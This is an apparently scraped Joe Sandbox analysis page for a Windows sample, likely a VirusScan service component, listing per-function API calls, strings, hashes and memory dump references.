Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
String ID:
API String ID: 3526400053-0
Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740

Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
OpenProcessToken.ADVAPI32 ref: 0000000140004007
GetLastError.KERNEL32 ref: 0000000140004011
LookupPrivilegeValueW.ADVAPI32 ref: 000000014000403A
AdjustTokenPrivileges.ADVAPI32 ref: 0000000140004080
GetLastError.KERNEL32 ref: 000000014000408A
CloseHandle.KERNEL32 ref: 0000000140004095
EnterCriticalSection.KERNEL32 ref: 00000001400040B3
LeaveCriticalSection.KERNEL32 ref: 000000014000412B
GetVersionExW.KERNEL32 ref: 0000000140004155
RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
RpcServerListen.RPCRT4 ref: 00000001400041D3
CreateWaitableTimerW.KERNEL32 ref: 0000000140004205
CreateEventW.KERNEL32 ref: 000000014000421C
SetWaitableTimer.KERNEL32 ref: 0000000140004289

Strings

ampStartSingletone: logging started, settins=%s, xrefs: 0000000140003FD5
SeLoadDriverPrivilege, xrefs: 000000014000402A
null, xrefs: 0000000140003FCE

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
API String ID: 3408796845-4213300970
Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44

Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

Strings

ampStopSingletone: logging ended, xrefs: 00000001400043B2

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
String ID: ampStopSingletone: logging ended
API String ID: 2048888615-3533855269
Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744

Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00

Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00000001400015A4
GetLastError.KERNEL32 ref: 00000001400015B2

Part of subcall function 0000000140001430: GetModuleFileNameW.KERNEL32 ref: 000000014000145E
Part of subcall function 0000000140001430: OpenSCManagerW.ADVAPI32 ref: 000000014000146C
Part of subcall function 0000000140001430: GetLastError.KERNEL32 ref: 000000014000147A

Strings

vseamps, xrefs: 0000000140001538
/remove, xrefs: 000000014000157E
/service, xrefs: 000000014000153F

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: ErrorLastManagerOpen$FileModuleName
String ID: /remove$/service$vseamps
API String ID: 67513587-3839141145
Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704

Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
GetProcAddress.KERNEL32 ref: 000000014000F0F3
GetProcAddress.KERNEL32 ref: 000000014000F117

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

Strings

USER32.DLL, xrefs: 000000014000F03B
MessageBoxA, xrefs: 000000014000F054
GetUserObjectInformationA, xrefs: 000000014000F0E9
GetActiveWindow, xrefs: 000000014000F075
GetLastActivePopup, xrefs: 000000014000F094
GetProcessWindowStation, xrefs: 000000014000F10D

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: AddressProc$Load$Library
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3981747205-232180764
Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210

Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140002315
CreateEventW.KERNEL32 ref: 0000000140002326
CreateEventW.KERNEL32 ref: 0000000140002340
CreateEventW.KERNEL32 ref: 000000014000235E
RpcImpersonateClient.RPCRT4 ref: 0000000140002372
GetCurrentThread.KERNEL32 ref: 0000000140002390
OpenThreadToken.ADVAPI32 ref: 00000001400023A7
RpcRevertToSelfEx.RPCRT4 ref: 0000000140002402

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
String ID:
API String ID: 4284112124-0
Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40

Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000000014000145E
OpenSCManagerW.ADVAPI32 ref: 000000014000146C
GetLastError.KERNEL32 ref: 000000014000147A
CreateServiceW.ADVAPI32 ref: 00000001400014D4
CloseServiceHandle.ADVAPI32 ref: 00000001400014E2
CloseServiceHandle.ADVAPI32 ref: 00000001400014F5

Strings

vseamps, xrefs: 00000001400014AD, 00000001400014B4

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
String ID: vseamps
API String ID: 3693165506-3944098904
Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00

Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF

Strings

..., xrefs: 0000000140009431
<program name unknown>, xrefs: 00000001400093D9
Microsoft Visual C++ Runtime Library, xrefs: 00000001400094B4
Runtime Error!Program: , xrefs: 000000014000938D

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304

Function 00007FFE1A5176E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFE1A517759
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE1A517771
RtlVirtualUnwind.KERNEL32 ref: 00007FFE1A5177AC
IsDebuggerPresent.KERNEL32 ref: 00007FFE1A5177E5
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE1A5177EF
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE1A5177FA

Strings

Rcl^i, xrefs: 00007FFE1A5176FD

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID: Rcl^i
API String ID: 1239891234-2241636769
Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction ID: 7f00baacd57c16f140912a2b6c9d89bdfa8e4cc5571eb5e97a600a5602932cdc
Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction Fuzzy Hash: A3317336708F8195D760CB65E8406BE33A1FB85BA4F5001B7EA8D43B65EF38C145CB00

Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000BBDC
GetLastError.KERNEL32 ref: 000000014000BBEC
LCMapStringW.KERNEL32 ref: 000000014000BC5F
WideCharToMultiByte.KERNEL32 ref: 000000014000BCC8
WideCharToMultiByte.KERNEL32 ref: 000000014000BD80
LCMapStringA.KERNEL32 ref: 000000014000BDA3

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

LCMapStringA.KERNEL32 ref: 000000014000BE48
MultiByteToWideChar.KERNEL32 ref: 000000014000BEC8

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: String$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 2057259594-0
Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700

Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 0000000140005A8B
GetProcessHeap.KERNEL32 ref: 0000000140005A92
HeapAlloc.KERNEL32 ref: 0000000140005AA3
GetVersionExA.KERNEL32 ref: 0000000140005AE6
GetProcessHeap.KERNEL32 ref: 0000000140005AF0
HeapFree.KERNEL32 ref: 0000000140005AFE
GetProcessHeap.KERNEL32 ref: 0000000140005B22
HeapFree.KERNEL32 ref: 0000000140005B30

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Heap$Process$Free$AllocInfoStartupVersion
String ID:
API String ID: 3103264659-0
Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741

Function 00007FFE1A512630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFE1A51264C
RtlCaptureContext.KERNEL32 ref: 00007FFE1A512679
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE1A512693
RtlVirtualUnwind.KERNEL32 ref: 00007FFE1A5126D4
IsDebuggerPresent.KERNEL32 ref: 00007FFE1A512728
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE1A512745
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE1A512750

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction ID: 0df473ea65eac9d8e5cebb56309f06a445dff3540951c508f90c8b71de79c105
Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction Fuzzy Hash: FB310976709A8186EB608FA1E8407FE7366FB85B94F44407BDA4E47AA4EF38D548C710

Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000000140007D66
IsDebuggerPresent.KERNEL32 ref: 0000000140007DAA
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140007DB4
UnhandledExceptionFilter.KERNEL32 ref: 0000000140007DBF
GetCurrentProcess.KERNEL32 ref: 0000000140007DD5
TerminateProcess.KERNEL32 ref: 0000000140007DE3

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
String ID:
API String ID: 1269745586-0
Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00

Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000014000A3AF
GetCurrentProcessId.KERNEL32 ref: 000000014000A3BA
GetCurrentThreadId.KERNEL32 ref: 000000014000A3C6
GetTickCount.KERNEL32 ref: 000000014000A3D2
QueryPerformanceCounter.KERNEL32 ref: 000000014000A3E3

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700

Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704

Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00000001400106EF
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140010735
